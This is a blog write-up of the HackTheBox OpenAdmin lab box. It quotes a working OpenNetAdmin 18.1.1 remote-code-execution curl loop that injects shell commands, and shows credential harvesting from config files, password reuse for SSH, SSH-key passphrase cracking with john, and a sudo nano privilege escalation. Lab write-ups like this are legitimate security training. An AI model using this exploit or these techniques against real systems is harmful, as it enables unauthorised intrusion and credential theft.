Skip to main content
HackTheBox OpenAdmin
  1. Hacks/

HackTheBox OpenAdmin

·1480 words·7 mins· loading · loading · ·
Marius Kimmina
Marius Kimmina
IT Infrastructure at scale

0x0 Introduction

The first HackTheBox Maschine I ever owned, featuring OpenNetAmin and typical admin mistakes

Openadmin Logo

0x1 getting a Foothold

Like most people probably do I started of the box with an nmap scan which returned the following result:

Nmap scan report for
Host is up (0.0058s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
# Nmap done at Sat Feb  1 06:58:04 2020 -- 1 IP address (1 host up) scanned in 7.02 seconds

ssh is not all that intresting as the attack surface there is rather low. so I decieded to look at the web site hosted at port 80 and found the Apache default page, just like nmap already told us but it never hurts to look ourselfs. Hoping to find other intresting endpoints on the Website I decided to run gobuster against it:

mindslave@kalibox:~$ gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-1.0.txt -u
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-1.0.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2020/02/01 07:14:34 Starting gobuster
/music (Status: 301)
/artwork (Status: 301)
2020/02/01 07:16:12 Finished

Looking at these 2 Endpoint we see “SOLMSUSIC” and “ARCWORK”, both sides were created from some template and are filled with lorem ipsum text.

After going through these sites and not really getting a foothold onto anything, I decieded to run gobuster again with a different list, tbh at this point I got kinda desperate from not finding anything so why not give a shot..

mindslave@kalibox:~/hackthebox/OpenAdmin$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u 10.1
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2020/02/01 10:12:08 Starting gobuster
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/artwork (Status: 301)
/music (Status: 301)
/server-status (Status: 403)
/sierra (Status: 301)
2020/02/01 10:12:25 Finished

This time we found /sierra and /ona, so there is new hope (and this time gobuster also informed me about the .htaccess). On /sierra we also find a lot of lorem-ipsum text but the /ona endpoint proved to be very interesting because it showed us that OpenNetAdmin is running on the box (something I have personally never heard of before), and it also tells us that it is an outdated version of OpenNetAdmin. A google search for ‘OpenNetAdmin 18.1.1 Exploit’ came back with an RCE as the first result.

# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage:
# Software Link:
# Version: v18.1.1
# Tested on: Linux

# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage:
# Software Link:
# Version: v18.1.1
# Tested on: Linux


while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1

Copied that into a local file and we are ready to use it.

mindslave@kalibox:~/hackthebox/OpenAdmin$ ./
$ whoami

0x2 Getting the user.txt

Now this part of the box took really, and I mean really, long for me. The first useful thing I found by looking at /etc/home is that there are 2 users jimmy and joanna from looking at the /etc/passwd we could also learn that jimmy is the admin for the apache server

/etc/apache2/sites-available/openadmin.conf:    ServerAdmin jimmy@openadmin.htb

And I also found out that you can look into /ona with admin admin as default creds which, ofcourse, still worked

/opt/ona/docs/INSTALL:8. You can log in as "admin" with a password of "admin"

And I also found these database credentials


$ona_contexts=array (
  'DEFAULT' =>
  array (
    'databases' =>
    array (
      0 =>
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',

And ofcoure jimmy reused this database password for his user account, which means we could now log in as jimmy

mindslave@kalibox:~$ ssh jimmy@
jimmy@'s password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:
 * Management:
 * Support:

  System information as of Fri Feb  7 05:41:26 UTC 2020

  System load:  0.01              Processes:             146
  Usage of /:   49.6% of 7.81GB   Users logged in:       2
  Memory usage: 22%               IP address for ens160:
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:

41 packages can be updated.
12 updates are security updates.

Failed to connect to Check your Internet connection or proxy settings

Last login: Fri Feb  7 05:39:24 2020 from

Now as Jimmy we want to find out which files belong to us and since all the interesting stuff seems to be in /var we do

find /var -user jimmy

which reveals:


main.php looked extremly interesting

<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session

This file is trying to output joanna’s ssh key, which we would obviously be interested in. running it with a simple “php main.php” we just get a permission denied tho. I then tried to access these files via the browser but could not find them on neither, which after a while got me thinking that they might be runnig on a different port

(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0*               LISTEN      -
tcp        0      0*               LISTEN      -
tcp        0      0 *               LISTEN      -
tcp        0      0    *               LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
udp        0      0 *                           -

Which turned out to be correct, the /internal pages are running on port 52846 and a simple curl gave us the ssh key

jimmy@openadmin:/var/www/internal$ curl localhost:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session

Now before we can use this to connect as joanna we have to find the password the Key, lets ask our friend John. First convert the file into john-readable format:

/usr/share/john/ id_rsa > johnfile.txt

Now we can use this john to recover the password from the johnfile.

mindslave@kalibox:~/hackthebox/OpenAdmin/ssh$ john --wordlist=/usr/share/wordlists/rockyou.txt johnfile.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (id_rsa)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:02 DONE (2020-02-07 08:27) 0.3745g/s 5371Kp/s 5371Kc/s 5371KC/sa6_123..*7¡Vamos!
Session completed

and we found the password: “bloodninjas”. This enabled us log in as Joanna and gave us the user flag for this box

joanna@openadmin:~$ ls
joanna@openadmin:~$ cat user.txt

0x3 getting the root.txt

This was acctually easier than getting the user, once you are logged in with joanna do:

joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass,

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

you can open the /opt/priv with nano as root without getting prompted for a password, once you open nano on that file you can instruct nano to read the /root/root.txt, which since it runs as root it will do without complains.


And that is it, instead of opening the root.txt you could also edit the /etc/passwd or the sudoers file to actually become a root user. At this point we have owned the box. This was my first Box on HTB and it won’t be the last!